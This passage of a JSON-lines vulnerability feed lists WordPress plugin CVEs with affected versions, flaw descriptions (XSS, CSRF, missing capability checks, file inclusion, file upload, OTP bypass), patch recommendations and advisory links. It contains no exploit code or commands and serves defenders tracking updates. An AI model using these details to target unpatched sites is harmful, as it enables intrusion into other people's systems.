version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368332%40insert-php&new=2368332%40insert-php&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368332%40insert-php&new=2368332%40insert-php&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573c0a4-d053-400b-828c-0d0eca880776?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e573c0a4-d053-400b-828c-0d0eca880776?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3452","slug":"secupress","versionImpact":"2.3.9","versionEndExcluding":"2.3.10","description":"The SecuPress Free \u2014 WordPress Security plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'secupress_reinstall_plugins_admin_ajax_cb' function in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins.","recommendation":"Update to version 2.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/modules\\\/plugins-themes\\\/tools.php#L686\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/modules\\\/plugins-themes\\\/tools.php#L686\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283453\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3283453\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9125873-aedd-4334-b8e0-74b67d301904?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9125873-aedd-4334-b8e0-74b67d301904?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0561","slug":"ultimate-posts-widget","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99b6aa8b-deb9-48f8-8896-f3c8118a4f70\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99b6aa8b-deb9-48f8-8896-f3c8118a4f70\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4765","slug":"portfolio-elementor","versionEndExcluding":"2.3.1","description":"The Portfolio for Elementor WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a21dc4a3-a4f3-4619-b8a3-493a27e14ccb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a21dc4a3-a4f3-4619-b8a3-493a27e14ccb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4824","slug":"wp-blog-and-widgets","versionEndExcluding":"2.3.1","description":"The WP Blog and Widgets WordPress plugin before 2.3.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9af8e425-c477-4e2b-9445-70ffb769f3f0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9af8e425-c477-4e2b-9445-70ffb769f3f0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3648","slug":"sharethis-share-buttons","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The ShareThis Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sharethis-inline-button' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b37c90-4bb5-4003-a440-3fb57a5c1cae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03b37c90-4bb5-4003-a440-3fb57a5c1cae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089529\\\/sharethis-share-buttons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089529\\\/sharethis-share-buttons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8792","slug":"subscribe-to-comments","versionImpact":"2.3","versionEndExcluding":"2.3.1","description":"The Subscribe to Comments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7566ac1-9ae2-44d2-8ad1-029957870992?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7566ac1-9ae2-44d2-8ad1-029957870992?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe-to-comments\\\/trunk\\\/subscribe-to-comments.php#L1470\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe-to-comments\\\/trunk\\\/subscribe-to-comments.php#L1470\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3177660%40subscribe-to-comments%2Ftrunk&old=1198281%40subscribe-to-comments%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3177660%40subscribe-to-comments%2Ftrunk&old=1198281%40subscribe-to-comments%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5533","slug":"knowledgebase","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Knowledge Base plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kbalert' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306850%40knowledgebase&new=3306850%40knowledgebase&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3306850%40knowledgebase&new=3306850%40knowledgebase&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400564ba-70f8-4566-b2e7-cfa6450b609e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/400564ba-70f8-4566-b2e7-cfa6450b609e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3073","slug":"easy-wp-smtp","versionImpact":"2.3.0","versionEndExcluding":"2.3.1","description":"The Easy WP SMTP by SendLayer \u2013 WordPress SMTP and Email Log Plugin plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 2.3.0. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.","recommendation":"Update to version 2.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b043197c-4477-4663-abb8-5840173c574d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b043197c-4477-4663-abb8-5840173c574d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101553%40easy-wp-smtp&new=3101553%40easy-wp-smtp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101553%40easy-wp-smtp&new=3101553%40easy-wp-smtp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8657","slug":"garden-gnome-package","versionImpact":"2.2.9","versionEndExcluding":"2.3.0","description":"The Garden Gnome Package plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ggpkg shortcode in all versions up to, and including, 2.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a295969-454a-47fb-bc35-4e84db38c887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a295969-454a-47fb-bc35-4e84db38c887?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.9\\\/include\\\/ggpackage.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.9\\\/include\\\/ggpackage.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3154566%40garden-gnome-package&new=3154566%40garden-gnome-package&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3154566%40garden-gnome-package&new=3154566%40garden-gnome-package&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9503","slug":"maintenance-coming-soon-redirect-animation","versionImpact":"2.1.3","versionEndExcluding":"2.3.0","description":"The Maintenance & Coming Soon Redirect Animation plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wploti_add_whitelisted_roles_option',  'wploti_remove_whitelisted_roles_option', 'wploti_add_whitelisted_users_option', 'wploti_remove_whitelisted_users_option', and 'wploti_uploaded_animation_save_option' functions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify certain plugin settings.","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maintenance-coming-soon-redirect-animation\\\/trunk\\\/wploti_maintenance_redirect.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/maintenance-coming-soon-redirect-animation\\\/trunk\\\/wploti_maintenance_redirect.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e716cf9-198c-4a32-883d-3f90dd399aee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e716cf9-198c-4a32-883d-3f90dd399aee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47174","slug":"performance-lab","versionEndExcluding":"2.3.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in WordPress Performance Team Performance Lab plugin <=\u00a02.2.0 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/performance-lab\\\/wordpress-performance-lab-plugin-2-2-0-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/performance-lab\\\/wordpress-performance-lab-plugin-2-2-0-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4805","slug":"tutor","versionImpact":"2.2.4","versionEndExcluding":"2.3.0","description":"The Tutor LMS WordPress plugin before 2.3.0 does not sanitise and escape some of its settings, which could allow users such as subscriber to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1049e940-49b1-4236-bea2-c636f35c5647\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1049e940-49b1-4236-bea2-c636f35c5647\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6383","slug":"debug-log-manager","versionImpact":"2.2.2","versionEndExcluding":"2.3.0","description":"The Debug Log Manager WordPress plugin before 2.3.0 contains a Directory listing vulnerability was discovered, which allows you to download the debug log without authorization and gain access to sensitive data","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eae63103-3de6-4100-8f48-2bcf9a5c91fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/eae63103-3de6-4100-8f48-2bcf9a5c91fb\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6335","slug":"tracking-code-manager","versionImpact":"2.2.0","versionEndExcluding":"2.3.0","description":"The Tracking Code Manager WordPress plugin before 2.3.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3bfb6b3f-8642-4807-b6b3-f214b26e96c2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3bfb6b3f-8642-4807-b6b3-f214b26e96c2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10133","slug":"subscribe-to-comments","versionImpact":"2.1.2","versionEndExcluding":"2.3","description":"The Subscribe to Comments for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 2.1.2 via the Path to header value. This allows authenticated attackers, with administrative privileges and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. This same function can also be used to execute arbitrary PHP code.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/advisories.dxw.com\\\/advisories\\\/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2\\\/\",\"name\":\"https:\\\/\\\/advisories.dxw.com\\\/advisories\\\/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132694\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132694\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1198281%40subscribe-to-comments&new=1198281%40subscribe-to-comments&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=1198281%40subscribe-to-comments&new=1198281%40subscribe-to-comments&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/seclists.org\\\/fulldisclosure\\\/2015\\\/Jul\\\/71\",\"name\":\"https:\\\/\\\/seclists.org\\\/fulldisclosure\\\/2015\\\/Jul\\\/71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f92784a7-f2b3-47f8-b03f-4e234b57e40a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f92784a7-f2b3-47f8-b03f-4e234b57e40a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10019","slug":"front-end-editor","versionEndExcluding":"2.3","description":"The Front End Editor plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the upload.php file in versions before 2.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132303\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/132303\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=600233%40front-end-editor&old=569105%40front-end-editor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=600233%40front-end-editor&old=569105%40front-end-editor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20120712205339\\\/https%3A\\\/\\\/www.opensyscom.fr\\\/Actualites\\\/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20120712205339\\\/https%3A\\\/\\\/www.opensyscom.fr\\\/Actualites\\\/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2012070701\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2012070701\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f271c2e7-9d58-4dea-95d3-3ffc4ec7c3b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f271c2e7-9d58-4dea-95d3-3ffc4ec7c3b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23734","slug":"userlike","versionEndExcluding":"2.3","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in David Voswinkel Userlike \u2013 WordPress Live Chat plugin <=\u00a02.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/userlike\\\/wordpress-userlike-wordpress-live-chat-plugin-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/userlike\\\/wordpress-userlike-wordpress-live-chat-plugin-plugin-2-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9019","slug":"secupress","versionImpact":"2.2.5.3","versionEndExcluding":"2.3","description":"The SecuPress Free \u2014 WordPress Security plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's secupress_check_ban_ips_form shortcode in all versions up to, and including, 2.2.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/common.php#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/secupress\\\/trunk\\\/free\\\/common.php#L238\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e842c8-61ac-4281-8c4a-9cb1f8ecc062?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56e842c8-61ac-4281-8c4a-9cb1f8ecc062?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2706","slug":"mobile-login-woocommerce","versionEndExcluding":"2.3","description":"The OTP Login Woocommerce & Gravity Forms plugin for WordPress is vulnerable to authentication bypass. This is due to the fact that when generating OTP codes for users to use in order to login via phone number, the plugin returns these codes in an AJAX response. This makes it possible for unauthenticated attackers to obtain login codes for administrators. This does require an attacker have access to the phone number configured for an account, which can be obtained via social engineering or reconnaissance.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1b7b653-496f-467a-9513-4be1891f38ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1b7b653-496f-467a-9513-4be1891f38ae?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912731%40mobile-login-woocommerce&new=2912731%40mobile-login-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2912731%40mobile-login-woocommerce&new=2912731%40mobile-login-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-login-woocommerce\\\/tags\\\/2.2\\\/includes\\\/class-xoo-ml-verification.php#L362\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mobile-login-woocommerce\\\/tags\\\/2.2\\\/includes\\\/class-xoo-ml-verification.php#L362\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5488","slug":"wp-masonry-infinite-scroll","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The WP Masonry & Infinite Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wmis' shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-masonry-infinite-scroll\\\/trunk\\\/includes\\\/functions.php#L227\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-masonry-infinite-scroll\\\/trunk\\\/includes\\\/functions.php#L227\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314905%40wp-masonry-infinite-scroll&new=3314905%40wp-masonry-infinite-scroll&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314905%40wp-masonry-infinite-scroll&new=3314905%40wp-masonry-infinite-scroll&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/656c6236-55e6-4989-8f3d-2d2f81ab0093?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/656c6236-55e6-4989-8f3d-2d2f81ab0093?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13743","slug":"wonderplugin-video-embed","versionImpact":"2.2","versionEndExcluding":"2.3","description":"The Wonder Video Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wonderplugin_video shortcode in all versions up to, and including, 2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wonderplugin-video-embed\\\/trunk\\\/app\\\/class-wonderplugin-videoembed-widgetview.php#L232\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wonderplugin-video-embed\\\/trunk\\\/app\\\/class-wonderplugin-videoembed-widgetview.php#L232\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97bd4897-c0c2-4819-aa25-942e256de9a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97bd4897-c0c2-4819-aa25-942e256de9a3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
